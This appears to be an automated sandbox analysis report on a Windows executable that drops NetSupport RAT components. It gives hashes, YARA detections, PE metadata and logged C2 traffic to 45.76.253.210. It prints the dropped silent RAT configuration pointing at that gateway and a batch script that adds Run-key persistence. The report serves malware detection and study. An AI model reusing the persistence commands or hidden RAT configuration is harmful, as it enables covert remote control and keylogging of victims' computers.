                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):3735416
                                                                                        Entropy (8bit):6.525042992590476
                                                                                        Encrypted:false
                                                                                        SSDEEP:49152:cTXNZ+0ci2aYNT8wstdAukudJ1xTvIZamclSp+73mPu:cTXNo0cpKwstTJIkS43mm
                                                                                        MD5:00587238D16012152C2E951A087F2CC9
                                                                                        SHA1:C4E27A43075CE993FF6BB033360AF386B2FC58FF
                                                                                        SHA-256:63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
                                                                                        SHA-512:637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.t.I.'.I.'.I.'A..'.I.'...'.I.'.?#'.I.'...'.I.'.1.'.I.'.I.'.J.'.1.'.I.'.1.'.I.'..#',I.'.."'.I.'...'.I.'...'.I.'...'.I.'Rich.I.'................PE..L......V...........!......... ..............0................................9.....f-9.....................................4........`................8.x)...P7.p....@.......................P.......P..@............0..........`....................text............................... ..`.rdata.......0......................@..@.data....%..........................@....tls.........@......................@....hhshare.....P......................@....rsrc........`......................@..@.reloc..(2...P7..4....6.............@..B........................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):396664
                                                                                        Entropy (8bit):6.809064783360712
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
                                                                                        MD5:EAB603D12705752E3D268D86DFF74ED4
                                                                                        SHA1:01873977C871D3346D795CF7E3888685DE9F0B16
                                                                                        SHA-256:6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
                                                                                        SHA-512:77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\TCCTL32.DLL, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):105848
                                                                                        Entropy (8bit):4.68250265552195
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:qTjV5+6j6Qa86Fkv2Wr120hZIqeTSGRp2TkFimMP:qHVZl6FhWr80/heT8TkFiH
                                                                                        MD5:8D9709FF7D9C83BD376E01912C734F0A
                                                                                        SHA1:E3C92713CE1D7EAA5E2B1FABEB06CDC0BB499294
                                                                                        SHA-256:49A568F8AC11173E3A0D76CFF6BC1D4B9BDF2C35C6D8570177422F142DCFDBE3
                                                                                        SHA-512:042AD89ED2E15671F5DF67766D11E1FA7ADA8241D4513E7C8F0D77B983505D63EBFB39FEFA590A2712B77D7024C04445390A8BF4999648F83DBAB6B0F04EB2EE
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\bild.exe, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...T..U.....................n...... ........ ....@..................................K....@.................................< ..<....0...i...........t..x).......... ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....i...0...j..................@..@.reloc..l............r..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):701
                                                                                        Entropy (8bit):5.5326954211374355
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:yZqzd+mPZGS/py6z8BlsVTXuZ7+DP981E7GXXfDWQClnmSuYIAlkz6:QqzEmPZly6YBlLoG1fXXfDirIAaz6
                                                                                        MD5:0F81A0520491093CA88F974D4FBAFE11
                                                                                        SHA1:555B4DCF7612435066DE5B5DC319855A48D5EAF7
                                                                                        SHA-256:2C27FB0A37F8BDFCCE98DAB852DEE3C2950C9810394A441A19ECE63C64DAF818
                                                                                        SHA-512:7B68AE33017D28A37982E718F0393FF7047C43B50AAD595D48A0AC61268D6D4162319D8B41B9997B577649D323206A4764E5D502CBC3715DAD35692253D8A9E0
                                                                                        Malicious:false
                                                                                        Preview:0x137310df....[Client].._present=1..DisableChatMenu=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAOeJWid73S6SvOyjjiTDVewA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0......[HTTP]..GatewayAddress=45.76.253.210:443..gsk=EFHH;K>OBDEJ9A<I@BCB..gskmode=0..gsku=EFHH;K>OBDEJ9A<I@BCB..GSKX=EFHH;K>OBDEJ9A<I@BCB....
                                                                                        Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):773968
                                                                                        Entropy (8bit):6.901559811406837
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                        MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                        SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                        SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                        SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):282
                                                                                        Entropy (8bit):5.151957838855328
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:hwszH1j0KpIAgidquH2QcfoZH1j0KpIAgidquH2QW3A:HVj0Kprgidqu++Vj0Kprgidqu2w
                                                                                        MD5:7604BB3E3698A7074FF39ECA4195391F
                                                                                        SHA1:F07E84CED88C3076B7A295FD845F7E420DCC3AF8
                                                                                        SHA-256:FE14D5B612CC516A7DDE97E3FE93FE35573F808B036E9C9513FCEADCB1BCC751
                                                                                        SHA-512:8639E1079F8E2DFD6AFB7CDCF4C6326B514A10C41841BEE035F62BA2234E60F13625515588787339CE1C469925595060EA2A9A1F2B3A60AA0D378F00540872C6
                                                                                        Malicious:true
                                                                                        Preview:@echo off..REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\bild.exe"..REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\bild.exe"..start %Public%\Netstat\bild.exe..
                                                                                        Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                        File Type:Windows setup INFormation
                                                                                        Category:dropped
                                                                                        Size (bytes):328
                                                                                        Entropy (8bit):4.93007757242403
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                        MD5:26E28C01461F7E65C402BDF09923D435
                                                                                        SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                        SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                        SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                        Malicious:false
                                                                                        Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                        Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):33144
                                                                                        Entropy (8bit):6.737780491933496
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                        MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                        SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                        SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                        SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\pcicapi.dll, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):77224
                                                                                        Entropy (8bit):6.793971095882093
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:zfafvTuNOwphKuyUHTqYXHhrXH4+LIyrxomee/+5IrAee/DIr3:jafLSpAFUzt0+LIyr7eR5IUeCIz
                                                                                        MD5:325B65F171513086438952A152A747C4
                                                                                        SHA1:A1D1C397902FF15C4929A03D582B09B35AA70FC0
                                                                                        SHA-256:26DBB528C270C812423C3359FC54D13C52D459CC0E8BC9B0D192725EDA34E534
                                                                                        SHA-512:6829555AB3851064C3AAD2D0C121077DB0260790B95BF087B77990A040FEBD35B8B286F1593DCCAA81B24395BD437F5ADD02037418FD5C9C8C78DC0989A9A10D
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 13%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L...c..c.....................J.......!............@.......................... ............@....................................<.......T................]..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):7.940363800405678
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                        File size:2'138'135 bytes
                                                                                        MD5:47cfce938a71540a2039aebd5abe0783
                                                                                        SHA1:641d20b31f5b2aba11746d1e533cbe4d4ee9c6ed
                                                                                        SHA256:d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d582b6d0b6f188306954
                                                                                        SHA512:338c95a30ccfbfe81b9a12d6ce01a68fdc3ace65da5fff17ccd06dbb4aa135cdf5ce3947107fd2ea46d32406bf6b30c908b6af673268b7c2ca554a7b67ddd4a1
                                                                                        SSDEEP:49152:VIf96RO0EkHbG+xw6NbHHBp7k5hhelN6YawnqLKwgVRl:VIFP6wYt5ShAiYawbwW
                                                                                        TLSH:CBA52302F9C6C5B2D53308390A68AB55797DBF342F28DD6FA78D5E1ACA301917338A53
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~..............b.......b..<....b......)^...................................................... ....... .......%....... ......
                                                                                        Icon Hash:1515d4d4442f2d2d
                                                                                        Entrypoint:0x41d779
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x5C72EA7E [Sun Feb 24 19:03:26 2019 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:5
                                                                                        OS Version Minor:1
                                                                                        File Version Major:5
                                                                                        File Version Minor:1
                                                                                        Subsystem Version Major:5
                                                                                        Subsystem Version Minor:1
                                                                                        Import Hash:00be6e6c4f9e287672c8301b72bdabf3
                                                                                        Instruction
                                                                                        call 00007F6268B0916Fh
                                                                                        jmp 00007F6268B08B63h
                                                                                        cmp ecx, dword ptr [0043A1C8h]
                                                                                        jne 00007F6268B08CD5h
                                                                                        ret
                                                                                        jmp 00007F6268B092E6h
                                                                                        and dword ptr [ecx+04h], 00000000h
                                                                                        mov eax, ecx
                                                                                        and dword ptr [ecx+08h], 00000000h
                                                                                        mov dword ptr [ecx+04h], 00430FE8h
                                                                                        mov dword ptr [ecx], 00431994h
                                                                                        ret
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        push esi
                                                                                        push dword ptr [ebp+08h]
                                                                                        mov esi, ecx
                                                                                        call 00007F6268AFC26Dh
                                                                                        mov dword ptr [esi], 004319A0h
                                                                                        mov eax, esi
                                                                                        pop esi
                                                                                        pop ebp
                                                                                        retn 0004h
                                                                                        and dword ptr [ecx+04h], 00000000h
                                                                                        mov eax, ecx
                                                                                        and dword ptr [ecx+08h], 00000000h
                                                                                        mov dword ptr [ecx+04h], 004319A8h
                                                                                        mov dword ptr [ecx], 004319A0h
                                                                                        ret
                                                                                        lea eax, dword ptr [ecx+04h]
                                                                                        mov dword ptr [ecx], 00431988h
                                                                                        push eax
                                                                                        call 00007F6268B0BE7Eh
                                                                                        pop ecx
                                                                                        ret
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        push esi
                                                                                        mov esi, ecx
                                                                                        lea eax, dword ptr [esi+04h]
                                                                                        mov dword ptr [esi], 00431988h
                                                                                        push eax
                                                                                        call 00007F6268B0BE67h
                                                                                        test byte ptr [ebp+08h], 00000001h
                                                                                        pop ecx
                                                                                        je 00007F6268B08CDCh
                                                                                        push 0000000Ch
                                                                                        push esi
                                                                                        call 00007F6268B082A2h
                                                                                        pop ecx
                                                                                        pop ecx
                                                                                        mov eax, esi
                                                                                        pop esi
                                                                                        pop ebp
                                                                                        retn 0004h
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        sub esp, 0Ch
                                                                                        lea ecx, dword ptr [ebp-0Ch]
                                                                                        call 00007F6268B08C3Eh
                                                                                        push 00437B58h
                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                        push eax
                                                                                        call 00007F6268B0B566h
                                                                                        int3
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        sub esp, 0Ch
                                                                                        Programming Language:
                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                        • [C++] VS2015 UPD3.1 build 24215
                                                                                        • [EXP] VS2015 UPD3.1 build 24215
                                                                                        • [RES] VS2015 UPD3 build 24213
                                                                                        • [LNK] VS2015 UPD3.1 build 24215
                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x38cd00x34.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x38d040x3c.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000xe034.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c0000x1fd0.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x36ee00x54.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x319280x40.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x300000x25c.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x382540x120.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x2e8640x2ea008c2dd3ebce78edeed565107466ae1d3eFalse0.5908595844504021data6.693477406609911IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x300000x9aac0x9c00b8d3a709e8e2861298e51f270be0f883False0.45718149038461536data5.133828516884417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0x3a0000x213d00xc007a066b052b7178cd1388c71d17dec570False0.2789713541666667data3.2428863859698565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .gfids0x5c0000xe80x2000a8129f1f5d2e8ddcb61343ecd6f891aFalse0.33984375data2.0959167744603624IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0x5d0000xe0340xe200d62594e063ef25acc085c21831d77a75False0.6341779590707964data6.802287495720703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x6c0000x1fd00x2000983e78af74da826d9233ebaa3055869aFalse0.8060302734375data6.687357530503152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        PNG0x5d6440xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced1.0027729636048528
                                                                                        PNG0x5e18c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced0.9363390441839495
                                                                                        RT_ICON0x5f7380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors0.47832369942196534
                                                                                        RT_ICON0x5fca00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors0.5410649819494585
                                                                                        RT_ICON0x605480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors0.4933368869936034
                                                                                        RT_ICON0x613f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m0.5390070921985816
                                                                                        RT_ICON0x618580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.41393058161350843
                                                                                        RT_ICON0x629000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m0.3479253112033195
                                                                                        RT_ICON0x64ea80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9809269502193401
                                                                                        RT_DIALOG0x68c1c0x2a2data0.5296735905044511
                                                                                        RT_DIALOG0x68ec00x13adata0.6624203821656051
                                                                                        RT_DIALOG0x68ffc0xf2data0.71900826446281
                                                                                        RT_DIALOG0x690f00x14edata0.5868263473053892
                                                                                        RT_DIALOG0x692400x318data0.476010101010101
                                                                                        RT_DIALOG0x695580x24adata0.6262798634812287
                                                                                        RT_STRING0x697a40x1fcdata0.421259842519685
                                                                                        RT_STRING0x699a00x246data0.41924398625429554
                                                                                        RT_STRING0x69be80x1dcdata0.5105042016806722
                                                                                        RT_STRING0x69dc40xdcdata0.65
                                                                                        RT_STRING0x69ea00x468data0.375
                                                                                        RT_STRING0x6a3080x164data0.5056179775280899
                                                                                        RT_STRING0x6a46c0xe4data0.6359649122807017
                                                                                        RT_STRING0x6a5500x158data0.4563953488372093
                                                                                        RT_STRING0x6a6a80xe8data0.5948275862068966
                                                                                        RT_STRING0x6a7900xe6data0.5695652173913044
                                                                                        RT_GROUP_ICON0x6a8780x68data0.7019230769230769
                                                                                        RT_MANIFEST0x6a8e00x753XML 1.0 document, ASCII text, with CRLF line terminators0.3957333333333333
                                                                                        DLLImport
                                                                                        KERNEL32.dllGetLastError, SetLastError, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, GetTickCount, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                                                                        gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-12-24T17:47:45.194573+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.54970445.76.253.210443TCP
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 24, 2024 17:47:52.032270908 CET49704443192.168.2.545.76.253.210
                                                                                        Dec 24, 2024 17:47:52.032335997 CET4434970445.76.253.210192.168.2.5
                                                                                        Dec 24, 2024 17:47:52.032413006 CET49704443192.168.2.545.76.253.210
                                                                                        Dec 24, 2024 17:47:52.168279886 CET49704443192.168.2.545.76.253.210
                                                                                        Dec 24, 2024 17:47:52.168311119 CET4434970445.76.253.210192.168.2.5
                                                                                        Dec 24, 2024 17:47:52.168397903 CET4434970445.76.253.210192.168.2.5
                                                                                        Dec 24, 2024 17:47:52.376526117 CET4970580192.168.2.5104.26.0.231
                                                                                        Dec 24, 2024 17:47:52.496117115 CET8049705104.26.0.231192.168.2.5
                                                                                        Dec 24, 2024 17:47:52.496193886 CET4970580192.168.2.5104.26.0.231
                                                                                        Dec 24, 2024 17:47:52.496387005 CET4970580192.168.2.5104.26.0.231
                                                                                        Dec 24, 2024 17:47:52.615789890 CET8049705104.26.0.231192.168.2.5
                                                                                        Dec 24, 2024 17:47:53.781337976 CET8049705104.26.0.231192.168.2.5
                                                                                        Dec 24, 2024 17:47:53.782864094 CET4970580192.168.2.5104.26.0.231
                                                                                        Dec 24, 2024 17:47:53.803155899 CET4970580192.168.2.5104.26.0.231
